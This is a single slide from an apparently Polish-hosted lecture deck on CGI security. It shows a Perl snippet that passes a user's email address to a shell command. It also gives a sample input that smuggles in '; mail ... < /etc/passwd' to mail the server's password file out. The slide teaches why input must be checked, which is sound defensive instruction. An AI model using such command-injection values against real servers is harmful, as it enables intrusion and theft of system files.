Server Technology PPNT Instrukcja Użytkownika Pobierz pdf (Strona 21)

CGI Security

Check parameters carefully!!!

if($email =~ /[^a-zA-Z0-9_\-\.@]/){

$_ = "The email address should be of

the form <i>user\@server</i>!";

}else{

$_ = qx($finger $email);

}

Suppose this e-mail address:

something ; mail [email protected] < /etc/passwd

Basically you let other people start programs on the server

Check what they want to do on your server!!!

Not only CGI! (PHP, Java Servlets, etc.)

(21/95)

1 2 ... 16 17 18 19 20 21 22 23 24 25 26 ... 94 95

Komentarze do niniejszej Instrukcji

Brak uwag